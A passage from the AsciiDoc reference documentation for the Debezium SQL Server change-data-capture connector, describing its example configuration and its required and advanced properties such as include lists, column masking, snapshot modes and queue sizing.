\"schemahistory.fullfillment\", \/\/ <11>\n \"database.ssl.truststore\": \"path\/to\/trust-store\", \/\/ <12>\n \"database.ssl.truststore.password\": \"password-for-trust-store\" \/\/ <13>\n }\n}\n----\n<1> The name of our connector when we register it with a Kafka Connect service.\n<2> The name of this SQL Server connector class.\n<3> The address of the SQL Server instance.\n<4> The port number of the SQL Server instance.\n<5> The name of the SQL Server user.\n<6> The password for the SQL Server user.\n<7> The comma-separated list of the SQL Server database names from which to capture changes.\n<8> The topic prefix for the SQL Server instance\/cluster, which forms a namespace and is used in all the names of the Kafka topics to which the connector writes, the Kafka Connect schema names, and the namespaces of the corresponding Avro schema when the xref:{link-avro-serialization}#avro-serialization[Avro converter] is used.\n<9> A list of all tables whose changes {prodname} should capture.\n<10> The list of Kafka brokers that this connector will use to write and recover DDL statements to the database schema history topic.\n<11> The name of the 
database schema history topic where the connector will write and recover DDL statements. This topic is for internal use only and should not be used by consumers.\n<12> The path to the SSL truststore that stores the server's signer certificates.\nThis property is required unless database encryption is disabled (`database.encrypt=false`).\n<13> The SSL truststore password.\nThis property is required unless database encryption is disabled (`database.encrypt=false`).\nendif::community[]\n\nFor the complete list of the configuration properties that you can set for the {prodname} SQL Server connector, see xref:{link-sqlserver-connector}#sqlserver-connector-properties[SQL Server connector properties].\n\nifdef::community[]\nYou can send this configuration with a `POST` command to a running Kafka Connect service.\nThe service records the configuration and starts up the one connector task that performs the following tasks:\n\n* Connects to the SQL Server database.\n* Reads the transaction log.\n* Records change events to Kafka topics.\n\n[[sqlserver-adding-connector-configuration]]\n=== Adding connector configuration\n\nTo start running a {prodname} SQL Server connector, create a connector configuration, and add the configuration to your Kafka Connect cluster.\n\n.Prerequisites\n\n* xref:{link-sqlserver-connector}#setting-up-sqlserver[CDC is enabled on SQL Server].\n* The {prodname} SQL Server connector is installed.\n\n.Procedure\n\n. Create a configuration for the SQL Server connector.\n\n. Use the link:{link-kafka-docs}\/#connect_rest[Kafka Connect REST API] to add that connector configuration to your Kafka Connect cluster.\nendif::community[]\n\n.Results\n\nWhen the connector starts, it xref:{link-sqlserver-connector}#sqlserver-snapshots[performs a consistent snapshot] of the SQL Server databases that the connector is configured for.\nThe connector then starts generating data change events for row-level operations and streaming the change event records to Kafka topics.\n\n\/\/ Type: reference\n\/\/ Title: Descriptions of {prodname} SQL Server connector configuration properties\n\/\/ ModuleID: descriptions-of-debezium-sqlserver-connector-configuration-properties\n[[sqlserver-connector-properties]]\n=== Connector properties\n\nThe {prodname} SQL Server connector has numerous configuration properties that you can use to achieve the right connector behavior for your application.\nMany properties have default values.\n\nInformation about the properties is organized as follows:\n\n* xref:sqlserver-required-connector-configuration-properties[Required connector configuration properties]\n* xref:sqlserver-advanced-connector-configuration-properties[Advanced connector configuration properties]\n* xref:debezium-sqlserver-connector-database-history-configuration-properties[Database schema history connector configuration properties] that control how {prodname} processes events that it reads from the database schema history topic.\n** xref:sqlserver-pass-through-database-history-properties-for-configuring-producer-and-consumer-clients[Pass-through database schema history properties]\n* xref:debezium-sqlserver-connector-pass-through-database-driver-configuration-properties[Pass-through database driver properties] that control the behavior of the database driver.\n\n[id=\"sqlserver-required-connector-configuration-properties\"]\n==== Required {prodname} SQL Server connector configuration properties\n\nThe following configuration properties are _required_ unless a default value is 
available.\n\n[cols=\"30%a,25%a,45%a\",options=\"header\"]\n|===\n|Property\n|Default\n|Description\n\n|[[sqlserver-property-name]]<<sqlserver-property-name, `+name+`>>\n|No default\n|Unique name for the connector. Attempting to register again with the same name will fail. (This property is required by all Kafka Connect connectors.)\n\n|[[sqlserver-property-connector-class]]<<sqlserver-property-connector-class, `+connector.class+`>>\n|No default\n|The name of the Java class for the connector. Always use a value of `io.debezium.connector.sqlserver.SqlServerConnector` for the SQL Server connector.\n\n|[[sqlserver-property-tasks-max]]<<sqlserver-property-tasks-max, `+tasks.max+`>>\n|`1`\n|Specifies the maximum number of tasks that the connector can use to capture data from the database instance.\nIf the xref:sqlserver-property-database-names[`database.names`] list contains more than one element, increase the value of this property to a number less than or equal to the number of elements in the `database.names` list.\n\n|[[sqlserver-property-database-hostname]]<<sqlserver-property-database-hostname, `+database.hostname+`>>\n|No default\n|IP address or hostname of the SQL Server database server.\n\n|[[sqlserver-property-database-port]]<<sqlserver-property-database-port, `+database.port+`>>\n|`1433`\n|Integer port number of the SQL Server database server.\n\n|[[sqlserver-property-database-user]]<<sqlserver-property-database-user, `+database.user+`>>\n|No default\n|Username to use when connecting to the SQL Server database server.\nCan be omitted when using Kerberos authentication, which can be configured using xref:debezium-{context}-connector-pass-through-database-driver-configuration-properties[pass-through properties].\n\n|[[sqlserver-property-database-password]]<<sqlserver-property-database-password, `+database.password+`>>\n|No default\n|Password to use when connecting to the SQL Server database server.\n\n|[[sqlserver-property-database-instance]] <<sqlserver-property-database-instance, `+database.instance+`>>\n|No default\n|Specifies the instance name of the link:https:\/\/docs.microsoft.com\/en-us\/sql\/database-engine\/configure-windows\/database-engine-instances-sql-server?view=sql-server-latest#instances[SQL Server named instance].\n\nifdef::community[]\n|[[sqlserver-property-database-names]]<<sqlserver-property-database-names, `+database.names+`>>\n|No default\n|The comma-separated list of the SQL Server database names from which to stream the changes.\nendif::community[]\n|[[sqlserver-property-topic-prefix]]<<sqlserver-property-topic-prefix, `+topic.prefix+`>>\n|No default\n|Topic prefix that provides a namespace for the SQL Server database server that you want {prodname} to capture.\nThe prefix should be unique across all other connectors, since it is used as the prefix for all Kafka topic names that receive records from this connector.\nOnly alphanumeric characters, hyphens, dots, and underscores can be used in the database server logical name. 
+\n +\n[WARNING]\n====\nDo not change the value of this property.\nIf you change the name value, after a restart, instead of continuing to emit events to the original topics, the connector emits subsequent events to topics whose names are based on the new value.\nThe connector is also unable to recover its database schema history topic.\n====\n\n|[[sqlserver-property-schema-include-list]]<<sqlserver-property-schema-include-list, `+schema.include.list+`>>\n|No default\n|An optional, comma-separated list of regular expressions that match names of schemas for which you *want* to capture changes.\nAny schema name not included in `schema.include.list` is excluded from having its changes captured.\nBy default, the connector captures changes for all non-system schemas. +\n\nTo match the name of a schema, {prodname} applies the regular expression that you specify as an _anchored_ regular expression.\nThat is, the specified expression is matched against the entire name string of the schema; it does not match substrings that might be present in a schema name. +\nIf you include this property in the configuration, do not also set the `schema.exclude.list` property.\n\n|[[sqlserver-property-schema-exclude-list]]<<sqlserver-property-schema-exclude-list, `+schema.exclude.list+`>>\n|No default\n|An optional, comma-separated list of regular expressions that match names of schemas for which you *do not* want to capture changes.\nAny schema whose name is not included in `schema.exclude.list` has its changes captured, with the exception of system schemas. +\n\nTo match the name of a schema, {prodname} applies the regular expression that you specify as an _anchored_ regular expression.\nThat is, the specified expression is matched against the entire name string of the schema; it does not match substrings that might be present in a schema name. +\nIf you include this property in the configuration, do not set the `schema.include.list` property.\n\n|[[sqlserver-property-table-include-list]]<<sqlserver-property-table-include-list, `+table.include.list+`>>\n|No default\n|An optional comma-separated list of regular expressions that match fully-qualified table identifiers for tables that you want {prodname} to capture.\nBy default, the connector captures all non-system tables for the designated schemas.\nWhen this property is set, the connector captures changes only from the specified tables.\nEach identifier is of the form _schemaName_._tableName_. +\n\nTo match the name of a table, {prodname} applies the regular expression that you specify as an _anchored_ regular expression.\nThat is, the specified expression is matched against the entire name string of the table; it does not match substrings that might be present in a table name. +\nIf you include this property in the configuration, do not also set the `table.exclude.list` property.\n\n|[[sqlserver-property-table-exclude-list]]<<sqlserver-property-table-exclude-list, `+table.exclude.list+`>>\n|No default\n|An optional comma-separated list of regular expressions that match fully-qualified table identifiers for the tables that you want to exclude from being captured.\n{prodname} captures all tables that are not included in `table.exclude.list`.\nEach identifier is of the form _schemaName_._tableName_. 
+\n\nTo match the name of a table, {prodname} applies the regular expression that you specify as an _anchored_ regular expression.\nThat is, the specified expression is matched against the entire name string of the table; it does not match substrings that might be present in a table name. +\nIf you include this property in the configuration, do not also set the `table.include.list` property.\n\n|[[sqlserver-property-column-include-list]]<<sqlserver-property-column-include-list, `+column.include.list+`>>\n|_empty string_\n|An optional comma-separated list of regular expressions that match the fully-qualified names of columns that should be included in the change event message values.\nFully-qualified names for columns are of the form _schemaName_._tableName_._columnName_.\nNote that primary key columns are always included in the event's key, even if not included in the value. +\n\nTo match the name of a column, {prodname} applies the regular expression that you specify as an _anchored_ regular expression.\nThat is, the specified expression is matched against the entire name string of the column; it does not match substrings that might be present in a column name. +\nIf you include this property in the configuration, do not also set the `column.exclude.list` property.\n\n|[[sqlserver-property-column-exclude-list]]<<sqlserver-property-column-exclude-list, `+column.exclude.list+`>>\n|_empty string_\n|An optional comma-separated list of regular expressions that match the fully-qualified names of columns that should be excluded from change event message values.\nFully-qualified names for columns are of the form _schemaName_._tableName_._columnName_.\nNote that primary key columns are always included in the event's key, even if they are excluded from the value. +\n\nTo match the name of a column, {prodname} applies the regular expression that you specify as an _anchored_ regular expression.\nThat is, the specified expression is matched against the entire name string of the column; it does not match substrings that might be present in a column name. +\nIf you include this property in the configuration, do not also set the `column.include.list` property.\n\n|[[sqlserver-property-column-mask-hash]]<<sqlserver-property-column-mask-hash, `column.mask.hash._hashAlgorithm_.with.salt._salt_`>>;\n[[sqlserver-property-column-mask-hash-v2]]<<sqlserver-property-column-mask-hash-v2, `column.mask.hash.v2._hashAlgorithm_.with.salt._salt_`>>\n|_n\/a_\n|An optional, comma-separated list of regular expressions that match the fully-qualified names of character-based columns.\nFully-qualified names for columns are of the form `_<schemaName>_._<tableName>_._<columnName>_`. +\nTo match the name of a column, {prodname} applies the regular expression that you specify as an _anchored_ regular expression.\nThat is, the specified expression is matched against the entire name string of the column; the expression does not match substrings that might be present in a column name.\nIn the resulting change event record, the values for the specified columns are replaced with pseudonyms. +\n\nA pseudonym consists of the hashed value that results from applying the specified _hashAlgorithm_ and _salt_.\nBased on the hash function that is used, referential integrity is maintained, while column values are replaced with pseudonyms.\nSupported hash functions are described in the {link-java7-standard-names}[MessageDigest section] of the Java Cryptography Architecture Standard Algorithm Name Documentation. 
+\n +\nIn the following example, `CzQMA0cB5K` is a randomly selected salt. +\n\n----\ncolumn.mask.hash.SHA-256.with.salt.CzQMA0cB5K = inventory.orders.customerName, inventory.shipment.customerName\n----\n\nIf necessary, the pseudonym is automatically shortened to the length of the column.\nThe connector configuration can include multiple properties that specify different hash algorithms and salts. +\n +\nDepending on the _hashAlgorithm_ used, the _salt_ selected, and the actual data set, the resulting data set might not be completely masked. +\n +\nHashing strategy version 2 should be used to ensure fidelity if the value is being hashed in different places or systems.\n\n|[[sqlserver-property-time-precision-mode]]<<sqlserver-property-time-precision-mode, `+time.precision.mode+`>>\n|`adaptive`\n| Time, date, and timestamps can be represented with different kinds of precision, including: `adaptive` (the default) captures the time and timestamp values exactly as in the database using either millisecond, microsecond, or nanosecond precision values based on the database column's type; or `connect` always represents time and timestamp values using Kafka Connect's built-in representations for Time, Date, and Timestamp, which uses millisecond precision regardless of the database columns' precision. See xref:{link-sqlserver-connector}#sqlserver-temporal-values[temporal values].\n\n|[[sqlserver-property-decimal-handling-mode]]<<sqlserver-property-decimal-handling-mode,`+decimal.handling.mode+`>>\n|`precise`\n|Specifies how the connector should handle values for `DECIMAL` and `NUMERIC` columns: +\n +\n`precise` (the default) represents them precisely using `java.math.BigDecimal` values represented in change events in a binary form. +\n +\n`double` represents them using `double` values, which may result in a loss of precision but is easier to use. +\n +\n`string` encodes values as formatted strings, which is easy to consume but semantic information about the real type is lost.\n\n|[[sqlserver-property-include-schema-changes]]<<sqlserver-property-include-schema-changes, `+include.schema.changes+`>>\n|`true`\n|Boolean value that specifies whether the connector should publish changes in the database schema to a Kafka topic with the same name as the database server ID. Each schema change is recorded with a key that contains the database name and a value that is a JSON structure that describes the schema update. This is independent of how the connector internally records database schema history. The default is `true`.\n\n|[[sqlserver-property-tombstones-on-delete]]<<sqlserver-property-tombstones-on-delete, `+tombstones.on.delete+`>>\n|`true`\n|Controls whether a _delete_ event is followed by a tombstone event. +\n +\n`true` - a delete operation is represented by a _delete_ event and a subsequent tombstone event. +\n +\n`false` - only a _delete_ event is emitted. 
+\n +\nAfter a source record is deleted, emitting a tombstone event (the default behavior) allows Kafka to completely delete all events that pertain to the key of the deleted row in case {link-kafka-docs}\/#compaction[log compaction] is enabled for the topic.\n\n|[[sqlserver-property-column-truncate-to-length-chars]]<<sqlserver-property-column-truncate-to-length-chars, `column.truncate.to._length_.chars`>>\n|_n\/a_\n|An optional, comma-separated list of regular expressions that match the fully-qualified names of character-based columns.\nSet this property if you want to truncate the data in a set of columns when it exceeds the number of characters specified by the _length_ in the property name.\nSet `length` to a positive integer value, for example, `column.truncate.to.20.chars`.\n\nThe fully-qualified name of a column observes the following format: `_<schemaName>_._<tableName>_._<columnName>_`.\nTo match the name of a column, {prodname} applies the regular expression that you specify as an _anchored_ regular expression.\nThat is, the specified expression is matched against the entire name string of the column; the expression does not match substrings that might be present in a column name.\n\nYou can specify multiple properties with different lengths in a single configuration.\n\n|[[sqlserver-property-column-mask-with-length-chars]]<<sqlserver-property-column-mask-with-length-chars, `column.mask.with._length_.chars`>>\n|_n\/a_\n|An optional, comma-separated list of regular expressions that match the fully-qualified names of character-based columns.\nSet this property if you want the connector to mask the values for a set of columns, for example, if they contain sensitive data.\nSet `_length_` to a positive integer to replace data in the specified columns with the number of asterisk (`*`) characters specified by the _length_ in the property name.\nSet _length_ to `0` (zero) to replace data in the specified columns with an empty string.\n\nThe fully-qualified name of a column observes the following format: _schemaName_._tableName_._columnName_.\nTo match the name of a column, {prodname} applies the regular expression that you specify as an _anchored_ regular expression.\nThat is, the specified expression is matched against the entire name string of the column; the expression does not match substrings that might be present in a column name.\n\nYou can specify multiple properties with different lengths in a single configuration.\n\n|[[sqlserver-property-column-propagate-source-type]]<<sqlserver-property-column-propagate-source-type, `+column.propagate.source.type+`>>\n|_n\/a_\n|An optional, comma-separated list of regular expressions that match the fully-qualified names of columns for which you want the connector to emit extra parameters that represent column metadata.\nWhen this property is set, the connector adds the following fields to the schema of event records:\n\n* `pass:[_]pass:[_]debezium.source.column.type` +\n* `pass:[_]pass:[_]debezium.source.column.length` +\n* `pass:[_]pass:[_]debezium.source.column.scale` +\n\nThese parameters propagate a column's original type name and length (for variable-width types), respectively. +\nEnabling the connector to emit this extra data can assist in properly sizing specific numeric or character-based columns in sink databases.\n\nThe fully-qualified name of a column observes the following format: _schemaName_._tableName_._columnName_. 
+\nTo match the name of a column, {prodname} applies the regular expression that you specify as an _anchored_ regular expression.\nThat is, the specified expression is matched against the entire name string of the column; the expression does not match substrings that might be present in a column name.\n\n|[[sqlserver-property-datatype-propagate-source-type]]<<sqlserver-property-datatype-propagate-source-type,`+datatype.propagate.source.type+`>>\n|_n\/a_\n|An optional, comma-separated list of regular expressions that specify the fully-qualified names of data types that are defined for columns in a database.\nWhen this property is set, for columns with matching data types, the connector emits event records that include the following extra fields in their schema:\n\n* `pass:[_]pass:[_]debezium.source.column.type` +\n* `pass:[_]pass:[_]debezium.source.column.length` +\n* `pass:[_]pass:[_]debezium.source.column.scale` +\n\nThese parameters propagate a column's original type name and length (for variable-width types), respectively. +\nEnabling the connector to emit this extra data can assist in properly sizing specific numeric or character-based columns in sink databases.\n\nFully-qualified data type names observe the following format: _schemaName_._tableName_._typeName_. +\nTo match the name of a data type, {prodname} applies the regular expression that you specify as an _anchored_ regular expression.\nThat is, the specified expression is matched against the entire name string of the data type; the expression does not match substrings that might be present in a type name.\n\nFor the list of SQL Server-specific data type names, see the xref:sqlserver-data-types[SQL Server data type mappings].\n\n|[[sqlserver-property-message-key-columns]]<<sqlserver-property-message-key-columns, `+message.key.columns+`>>\n|_n\/a_\n|A list of expressions that specify the columns that the connector uses to form custom message keys for change event records that it publishes to the Kafka topics for specified tables.\n\nBy default, {prodname} uses the primary key column of a table as the message key for records that it emits.\nIn place of the default, or to specify a key for tables that lack a primary key, you can configure custom message keys based on one or more columns. +\n +\nTo establish a custom message key for a table, list the table, followed by the columns to use as the message key.\nEach list entry takes the following format: +\n +\n`_<fully-qualified_tableName>_:__<keyColumn>__,_<keyColumn>_` +\n +\nTo base a table key on multiple column names, insert commas between the column names.\n\nEach fully-qualified table name is a regular expression in the following format: +\n +\n`_<schemaName>_._<tableName>_` +\n +\nThe property can include entries for multiple tables.\nUse a semicolon to separate table entries in the list. 
+\n +\nThe following example sets the message key for the tables `inventory.customers` and `purchase.orders`: +\n +\n`inventory.customers:pk1,pk2;(.*).purchaseorders:pk3,pk4` +\n +\nFor the table `inventory.customers`, the columns `pk1` and `pk2` are specified as the message key.\nFor the `purchaseorders` tables in any schema, the columns `pk3` and `pk4` serve as the message key.\n\nThere is no limit to the number of columns that you use to create custom message keys.\nHowever, it's best to use the minimum number that are required to specify a unique key.\n\n|[[sqlserver-property-binary-handling-mode]]<<sqlserver-property-binary-handling-mode, `+binary.handling.mode+`>>\n|bytes\n|Specifies how binary (`binary`, `varbinary`) columns should be represented in change events.\nThe following options are supported: `bytes` represents binary data as a byte array (default), `base64` represents binary data as a base64-encoded string, `base64-url-safe` represents binary data as a base64-url-safe-encoded string, and `hex` represents binary data as a hex-encoded (base16) string.\n\n|[[sqlserver-property-schema-name-adjustment-mode]]<<sqlserver-property-schema-name-adjustment-mode,`+schema.name.adjustment.mode+`>>\n|none\n|Specifies how schema names should be adjusted for compatibility with the message converter used by the connector. Possible settings: +\n\n* `none` does not apply any adjustment. +\n* `avro` replaces the characters that cannot be used in the Avro type name with an underscore. +\n\n|===\n\n[id=\"sqlserver-advanced-connector-configuration-properties\"]\n==== Advanced SQL Server connector configuration properties\n\nThe following _advanced_ configuration properties have good defaults that will work in most situations and therefore rarely need to be specified in the connector's configuration.\n\n[cols=\"30%a,25%a,45%a\",options=\"header\"]\n|===\n|Property\n|Default\n|Description\n\n|[[sqlserver-property-converters]]<<sqlserver-property-converters, `converters`>>\n|No default\n|Enumerates a comma-separated list of the symbolic names of the {link-prefix}:{link-custom-converters}#custom-converters[custom converter] instances that the connector can use.\nFor example, +\n\n`isbn`\n\nYou must set the `converters` property to enable the connector to use a custom converter.\n\nFor each converter that you configure for a connector, you must also add a `.type` property, which specifies the fully-qualified name of the class that implements the converter interface.\nThe `.type` property uses the following format: +\n\n`_<converterSymbolicName>_.type` +\n\nFor example, +\n\n isbn.type: io.debezium.test.IsbnConverter\n\nIf you want to further control the behavior of a configured converter, you can add one or more configuration parameters to pass values to the converter.\nTo associate any additional configuration parameter with a converter, prefix the parameter names with the symbolic name of the converter.\nFor example, +\n\n isbn.schema.name: io.debezium.sqlserver.type.Isbn\n\n|[[sqlserver-property-snapshot-mode]]<<sqlserver-property-snapshot-mode, `+snapshot.mode+`>>\n|_initial_\n|A mode for taking an initial snapshot of the structure and optionally data of captured tables.\nOnce the snapshot is complete, the connector will continue reading change events from the database's redo logs.\nThe following values are supported:\n\n* `initial`: Takes a snapshot of structure and data of captured tables; useful if topics should be populated with a complete representation of the data from the captured tables. 
+\n* `initial_only`: Takes a snapshot of structure and data like `initial`, but does not transition into streaming changes once the snapshot has completed. +\n* `schema_only`: Takes a snapshot of the structure of captured tables only; useful if only changes happening from now onwards should be propagated to topics.\n\n|[[sqlserver-property-snapshot-include-collection-list]]<<sqlserver-property-snapshot-include-collection-list, `+snapshot.include.collection.list+`>>\n| All tables specified in `table.include.list`\n|An optional, comma-separated list of regular expressions that match the fully-qualified names (`_<dbName>_._<schemaName>_._<tableName>_`) of the tables to include in a snapshot.\nThe specified items must be named in the connector's xref:{context}-property-table-include-list[`table.include.list`] property.\nThis property takes effect only if the connector's xref:sqlserver-property-snapshot-mode[`snapshot.mode`] property is set to a value other than `schema_only`. +\nThis property does not affect the behavior of incremental snapshots. +\n\nTo match the name of a table, {prodname} applies the regular expression that you specify as an _anchored_ regular expression.\nThat is, the specified expression is matched against the entire name string of the table; it does not match substrings that might be present in a table name.\n\n|[[sqlserver-property-snapshot-isolation-mode]]<<sqlserver-property-snapshot-isolation-mode, `+snapshot.isolation.mode+`>>\n|_repeatable_read_\n|Mode to control which transaction isolation level is used and how long the connector locks tables that are designated for capture.\nThe following values are supported:\n\n* `read_uncommitted`\n* `read_committed`\n* `repeatable_read`\n* `snapshot`\n* `exclusive` (`exclusive` mode uses repeatable read isolation level, however, it takes the exclusive lock on all tables\nto be read). +\n\nThe `snapshot`, `read_committed` and `read_uncommitted` modes do not prevent other\ntransactions from updating table rows during the initial snapshot.\nThe `exclusive` and `repeatable_read` modes do prevent concurrent updates. +\n\nMode choice also affects data consistency. Only the `exclusive` and `snapshot` modes guarantee full consistency, that is, the initial\nsnapshot and streaming logs constitute a linear history.\nIn case of the `repeatable_read` and `read_committed` modes, it might happen that, for instance, a newly added record appears\ntwice - once in the initial snapshot and once in the streaming phase. Nonetheless, that consistency level is acceptable for\ndata mirroring.\nFor `read_uncommitted` there are no data consistency guarantees at all (some data might be lost or corrupted).\n\n|[[sqlserver-property-event-processing-failure-handling-mode]]<<sqlserver-property-event-processing-failure-handling-mode, `+event.processing.failure.handling.mode+`>>\n|`fail`\n| Specifies how the connector should react to exceptions during processing of events.\n`fail` will propagate the exception (indicating the offset of the problematic event), causing the connector to stop. +\n`warn` will cause the problematic event to be skipped and the offset of the problematic event to be logged. +\n`skip` will cause the problematic event to be skipped.\n\n|[[sqlserver-property-poll-interval-ms]]<<sqlserver-property-poll-interval-ms, `+poll.interval.ms+`>>\n|`500`\n|Positive integer value that specifies the number of milliseconds the connector should wait during each iteration for new change events to appear. 
Defaults to 500 milliseconds.\n\n|[[sqlserver-property-max-queue-size]]<<sqlserver-property-max-queue-size, `+max.queue.size+`>>\n|`8192`\n|Positive integer value that specifies the maximum number of records that the blocking queue can hold.\nWhen {prodname} reads events streamed from the database, it places the events in the blocking queue before it writes them to Kafka.\nThe blocking queue can provide backpressure for reading change events from the database\nin cases where the connector ingests messages faster than it can write them to Kafka, or when Kafka becomes unavailable.\nEvents that are held in the queue are disregarded when the connector periodically records offsets.\nAlways set the value of `max.queue.size` to be larger than the value of xref:{context}-property-max-batch-size[`max.batch.size`].\n\n|[[sqlserver-property-max-queue-size-in-bytes]]<<sqlserver-property-max-queue-size-in-bytes, `+max.queue.size.in.bytes+`>>\n|`0`\n|A long integer value that specifies the maximum volume of the blocking queue in bytes.\nBy default, volume limits are not specified for the blocking queue.\nTo specify the number of bytes that the queue can consume, set this property to a positive long value. +\nIf xref:sqlserver-property-max-queue-size[`max.queue.size`] is also set, writing to the queue is blocked when the size of the queue reaches the limit specified by either property.\nFor example, if you set `max.queue.size=1000`, and `max.queue.size.in.bytes=5000`, writing to the queue is blocked after the queue contains 1000 records, or after the volume of the records in the queue reaches 5000 bytes.\n\n|[[sqlserver-property-max-batch-size]]<<sqlserver-property-max-batch-size, `+max.batch.size+`>>\n|`2048`\n|Positive integer value that specifies the maximum size of each batch of events that should be processed during each iteration of this connector.\n\n|[[sqlserver-property-heartbeat-interval-ms]]<<sqlserver-property-heartbeat-interval-ms, `+heartbeat.interval.ms+`>>\n|`0`\n|Controls how frequently heartbeat messages are sent. +\nThis property contains an interval in milliseconds that defines how frequently the connector sends messages to a heartbeat topic.\nThe property can be used to confirm whether the connector is still receiving change events from the database.\nYou should also use heartbeat messages in cases where only records in non-captured tables are changed for a longer period of time.\nIn such a situation, the connector would proceed to read the log from the database but never emit any change messages into Kafka,\nwhich in turn means that no offset updates are committed to Kafka.\nThis may result in more change events being re-sent after a connector restart.\nSet this parameter to `0` to not send heartbeat messages at all. +\nDisabled by default.\n\n|[[sqlserver-property-snapshot-delay-ms]]<<sqlserver-property-snapshot-delay-ms, `+snapshot.delay.ms+`>>\n|No default\n|An interval in milliseconds that the connector should wait before taking a snapshot after starting up. +\nCan be used to avoid snapshot interruptions when starting multiple connectors in a cluster, which may cause re-balancing of connectors.\n\n|[[sqlserver-property-snapshot-fetch-size]]<<sqlserver-property-snapshot-fetch-size, `+snapshot.fetch.size+`>>\n|`2000`\n|Specifies the maximum number of rows that should be read at a time from each table while taking a snapshot.\nThe connector will read the table contents in multiple batches of this size. 
Defaults to 2000.\n\n|[[sqlserver-property-query-fetch-size]]<<sqlserver-property-query-fetch-size, `+query.fetch.size+`>>\n|No default\n|Specifies the number of rows that will be fetched for each database round-trip of a given query.\nDefaults to the JDBC driver's default fetch size.\n\n|[[sqlserver-property-snapshot-lock-timeout-ms]]<<sqlserver-property-snapshot-lock-timeout-ms, `+snapshot.lock.timeout.ms+`>>\n|`10000`\n|An integer value that specifies the maximum amount of time (in milliseconds) to wait to obtain table locks when performing a snapshot. If table locks cannot be acquired in this time interval, the snapshot will fail (also see xref:{link-sqlserver-connector}#sqlserver-snapshots[snapshots]). +\nWhen set to `0` the connector will fail immediately when it cannot obtain the lock. Value `-1` indicates infinite waiting.\n\n|[[sqlserver-property-snapshot-select-statement-overrides]]<<sqlserver-property-snapshot-select-statement-overrides, `+snapshot.select.statement.overrides+`>>\n|No default\n|Specifies the table rows to include in a snapshot.\nUse the property if you want a snapshot to include only a subset of the rows in a table.\nThis property affects snapshots only.\nIt does not apply to events that the connector reads from the log.\n\nThe property contains a comma-separated list of fully-qualified table names in the form `_<schemaName>.<tableName>_`. For example, +\n +\n`+\"snapshot.select.statement.overrides\": \"inventory.products,customers.orders\"+` +\n +\nFor each table in the list, add a further configuration property that specifies the `SELECT` statement for the connector to run on the table when it takes a snapshot.\nThe specified `SELECT` statement determines the subset of table rows to include in the snapshot.\nUse the following format to specify the name of this `SELECT` statement property: +\n +\n`snapshot.select.statement.overrides._<schemaName>_._<tableName>_`.\nFor example,\n`snapshot.select.statement.overrides.customers.orders`. +\n +\nExample:\n\nFrom a `customers.orders` table that includes the soft-delete column, `delete_flag`, add the following properties if you want a snapshot to include only those records that are not soft-deleted:\n\n----\n\"snapshot.select.statement.overrides\": \"customers.orders\",\n\"snapshot.select.statement.overrides.customers.orders\": \"SELECT * FROM [customers].[orders] WHERE delete_flag = 0 ORDER BY id DESC\"\n----\n\nIn the resulting snapshot, the connector includes only the records for which `delete_flag = 0`.\nifdef::community[]\n|[[sqlserver-property-source-struct-version]]<<sqlserver-property-source-struct-version, `+source.struct.version+`>>\n|v2\n|Schema version for the `source` block in CDC events; {prodname} 0.10 introduced a few breaking +\nchanges to the structure of the `source` block in order to unify the exposed structure across\nall the connectors. 
+\nBy setting this option to `v1` the structure used in earlier versions can be produced.\nNote that this setting is not recommended and is planned for removal in a future {prodname} version.\nendif::community[]\n\n|[[sqlserver-property-sanitize-field-names]]<<sqlserver-property-sanitize-field-names, `+sanitize.field.names+`>>\n|`true` when connector configuration explicitly specifies the `key.converter` or `value.converter` parameters to use Avro, otherwise defaults to `false`.\n|Whether field names are sanitized to adhere to Avro naming requirements.\nSee xref:{link-avro-serialization}#avro-naming[Avro naming] for more details.\n\n|[[sqlserver-property-provide-transaction-metadata]]<<sqlserver-property-provide-transaction-metadata, `+provide.transaction.metadata+`>>\n|`false`\n|When set to `true`, {prodname} generates events with transaction boundaries and enriches the data event envelope with transaction metadata.\n\n|[[sqlserver-property-retriable-restart-connector-wait-ms]]<<sqlserver-property-retriable-restart-connector-wait-ms, `+retriable.restart.connector.wait.ms+`>> +\n|10000 (10 seconds)\n|The number of milliseconds to wait before restarting a connector after a retriable error occurs.\n\n|[[sqlserver-property-skipped-operations]]<<sqlserver-property-skipped-operations, `+skipped.operations+`>>\n|`t`\n|A comma-separated list of operation types that will be skipped during streaming.\nThe operations include: `c` for inserts\/create, `u` for updates, `d` for deletes, `t` for truncates, and `none` to not skip any operations.\nBy default, truncate operations are skipped (not emitted by this connector).\n\n|[[sqlserver-property-signal-data-collection]]<<sqlserver-property-signal-data-collection,`+signal.data.collection+`>>\n|No default value\n| Fully-qualified name of the data collection that is used to send xref:{link-signalling}#debezium-signaling-enabling-signaling[signals] to the connector. +\nUse the following format to specify the collection name: +\n`_<databaseName>_._<schemaName>_._<tableName>_`\n\n|[[sqlserver-property-incremental-snapshot-allow-schema-changes]]<<sqlserver-property-incremental-snapshot-allow-schema-changes, `+incremental.snapshot.allow.schema.changes+`>>\n|`false`\n| Allow schema changes during an incremental snapshot. When enabled, the connector detects schema changes during an incremental snapshot and re-selects the current chunk to avoid locking DDLs. +\n +\nNote that changes to a primary key are not supported and can cause incorrect results if performed during an incremental snapshot. Another limitation is that if a schema change affects only columns' default values, then the change won't be detected until the DDL is processed from the transaction log stream. 
This doesn't affect the snapshot events' values, but the schema of snapshot events may have outdated defaults.\n\n|[[sqlserver-property-incremental-snapshot-chunk-size]]<<sqlserver-property-incremental-snapshot-chunk-size, `+incremental.snapshot.chunk.size+`>>\n|`1024`\n|The maximum number of rows that the connector fetches and reads into memory during an incremental snapshot chunk.\nIncreasing the chunk size provides greater efficiency, because the snapshot runs fewer snapshot queries of a greater size.\nHowever, larger chunk sizes also require more memory to buffer the snapshot data.\nAdjust the chunk size to a value that provides the best performance in your environment.\n\n|[[sqlserver-property-max-iteration-transactions]]<<sqlserver-property-max-iteration-transactions, `+max.iteration.transactions+`>>\n|0\n|Specifies the maximum number of transactions per iteration to be used to reduce the memory footprint when streaming changes from multiple tables in a database.\nWhen set to `0` (the default), the connector uses the current maximum LSN as the range to fetch changes from.\nWhen set to a value greater than zero, the connector uses the n-th LSN specified by this setting as the range to fetch changes from.\n\n|[[sqlserver-property-incremental-snapshot-option-recompile]]<<sqlserver-property-incremental-snapshot-option-recompile, `+incremental.snapshot.option.recompile+`>>\n|`false`\n|Applies the `OPTION(RECOMPILE)` query hint to all `SELECT` statements used during an incremental snapshot. This can help to solve parameter-sniffing issues that may occur, but can cause increased CPU load on the source database, depending on the frequency of query execution.\n\n|[[sqlserver-property-topic-naming-strategy]]<<sqlserver-property-topic-naming-strategy, 